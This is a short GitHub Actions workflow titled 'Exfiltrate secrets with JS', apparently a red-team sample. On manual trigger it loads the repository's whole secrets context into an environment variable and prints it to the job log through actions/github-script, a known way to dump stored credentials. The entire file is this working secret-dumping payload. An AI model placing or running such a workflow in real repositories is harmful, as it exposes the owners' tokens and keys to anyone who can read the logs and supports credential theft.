name: Exfiltrate secrets with JS

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Secrets
        uses: actions/github-script@v4
        env:
          SECRETS: ${{ secrets }}
        with:
          script: |
            // write secrets in console
            console.log(process.env.SECRETS);